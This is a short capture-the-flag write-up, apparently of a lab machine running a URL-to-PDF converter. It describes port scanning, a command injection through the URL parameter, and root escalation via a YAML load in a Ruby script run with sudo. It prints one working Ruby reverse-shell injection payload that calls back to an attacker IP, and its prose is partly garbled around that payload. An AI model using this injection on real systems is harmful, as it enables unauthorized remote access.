A simple NMAP scan to just get the lay of the land initially. Only two ports appear to be open. SSH appears to allow for password auth, and the web port hosts a page that allegedly converts pages to PDFs.
Brute forcing additional pages on the web server did not yield any results.
After poling around for a bit trying to achieve command injection, I finally took a look at the raw data being sent back from the server when I was able to render a PDF.
Oddly, the PDF would only be rendered when I capitalized the
HTTP portion of the URL. Anyways, using
exiftool on the resultant file indicates that it was generated by
http://example.com/NAME=?%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.34",8081))'`
After some local enumeration, I was able to find some credentials for
henry in the
ruby user's home directory.
And with that password, I can SSH to the machine as Henry.
Some very quick enumeration reveals that Henry can run both Ruby on
update_dependencies.rb as root without a password. However, that file is write protected so a direct edit won't work. But it is world readable.
From the file, I can see that it will load a
dependencies.yml file from the current directory. Researching this for a quick second led me to this blog that outlines a gadget for command execution via YAML loads. With this I am able to read the root flag successfully and could ultimately escalate to the root user.